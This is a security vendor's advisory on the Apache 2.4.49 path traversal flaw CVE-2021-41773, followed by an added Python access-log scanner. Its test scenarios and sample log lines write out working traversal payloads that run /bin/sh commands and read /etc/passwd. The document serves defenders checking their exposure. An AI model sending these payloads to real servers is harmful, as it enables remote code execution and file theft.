On October 5, 2021, the Apache Software Foundation provided an update that patched CVE-2021-41773. This vulnerability is a path normalization issue that can be leveraged to read arbitrary files and in some cases execute remote code in Apache’s widely adopted HTTP Server. It affects version 2.4.49 only but is actively being exploited in the wild and Randori has found numerous matching versions exposed on internet-facing assets.
The Randori Attack Team has developed a reliable working exploit, tested it in a lab environment, and has begun leveraging the capability as part of Randori’s continuous and automated red team platform. Under the right configuration settings, this vulnerability is trivial to exploit, and affected organizations should patch immediately.
For defenders looking for a way to understand if they are impacted, the Randori Attack Team has provided details on the non-default configurations required for successful exploitation and steps organizations can take to test for the vulnerability.
To successfully exploit CVE-2021-41773, Apache 2.4.49 must be set up in a non-default configuration.
There are two configuration patterns that are susceptible to two different exploitation techniques:
- If mod_cgi is enabled and “require all granted” is applied to the default Directory block, then an attacker can execute remote code with permissions of the user running Apache.
- If mod_cgi is not enabled and “require all granted” is applied to the default Directory block, then an attacker can read arbitrary files with permissions of the user running Apache.
If a system has either of these configurations, exploitation of this vulnerability is trivial. If “require all granted” is present for any path, exploitation may still be possible, and other vulnerable cases may exist. Randori recommends upgrading to Apache 2.4.50.
How To Test For Vulnerability
Scenario 1: Vulnerable to Remote Code Execution
Example of remote code execution on a system with mod_cgi enabled.
$ curl "$HOST/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh" -d 'echo;id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Scenario 2: Vulnerable to File Inclusion
Example of reading a file on a vulnerable system without mod_cgi enabled.
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
Scenario 3: Vulnerable to File Inclusion but not Remote Code Execution
Example of trying to run a command on a system that is vulnerable to file disclosure but does not have mod_cgi enabled.
$ curl "$HOST/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" -d 'echo;id'
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.
Based on our research, we can confirm that for organizations running Apache 2.4.49 with a vulnerable configuration this issue is serious and action should be taken to ensure the security of impacted devices.
The vulnerability was made public on October 5; therefore, organizations running instances of Apache 2.4.49 exposed to the Internet from that date forward should assume that an adversary may have gained access to their network. Randori recommends reviewing historical logs for anomalous behavior such as unusual URL paths, unexpected source IPs, and other signs of compromise.
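As an added example (not part of Randori’s post), the following Python script shows one way to carry out the log review recommended above: it scans Apache access-log lines for the encoded dot segments (.%2e, %2e., %2e%2e) that characterize this path normalization bug and separates probable code-execution attempts against cgi-bin from file-read attempts. The log lines are constructed for the example; the regex field names and labels are the author’s own.

```python
import re
from urllib.parse import unquote

# Apache combined-log format; group names are this example's own choice.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# A two-character segment made of literal or percent-encoded dots.
ENCODED_DOT_SEG = re.compile(r'^(?:\.|%2e){2}$', re.IGNORECASE)


def encoded_dot_segments(raw_path):
    """Count segments that decode to '..' but carried at least one encoded
    dot. Plain '..' segments are normalized correctly by httpd and are
    deliberately not counted, so ordinary relative paths stay quiet."""
    path = raw_path.split('?', 1)[0]
    return sum(1 for seg in path.split('/')
               if '%2e' in seg.lower() and ENCODED_DOT_SEG.match(seg))


def classify(method, raw_path):
    """None for a benign request; otherwise a label for the likely goal."""
    if encoded_dot_segments(raw_path) == 0:
        return None
    first = raw_path.split('/')[1].lower() if raw_path.startswith('/') else ''
    if first == 'cgi-bin' and method == 'POST':
        return 'rce-attempt'       # traversal out of cgi-bin with a POST body
    return 'file-read-attempt'


def scan_access_log(lines):
    """Return (ip, status, label, decoded path) for each suspicious line.
    A 200 status on a hit means the request was served, not just attempted."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (label := classify(m['method'], m['path'])):
            hits.append((m['ip'], int(m['status']), label, unquote(m['path'])))
    return hits


# Constructed sample: two traversal requests and two benign ones.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Oct/2021:10:15:01 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 52 "-" "curl/7.68.0"',
    '203.0.113.5 - - [06/Oct/2021:10:15:07 +0000] "GET /icons/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1406 "-" "curl/7.68.0"',
    '198.51.100.7 - - [06/Oct/2021:10:16:00 +0000] "GET /index.html HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Oct/2021:10:16:02 +0000] "GET /docs/../index.html HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Run it over a real access.log by replacing SAMPLE_LOG with the file’s lines; any hit with status 200 deserves the same follow-up as a confirmed compromise.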
Organizations unsure of their exposure or looking to confirm their risk can request a free attack surface audit from Randori. This personalized assessment will analyze your organization’s exposed internet-facing assets and provide a custom assessment of your most tempting access points, along with recommendations on how to reduce your risk.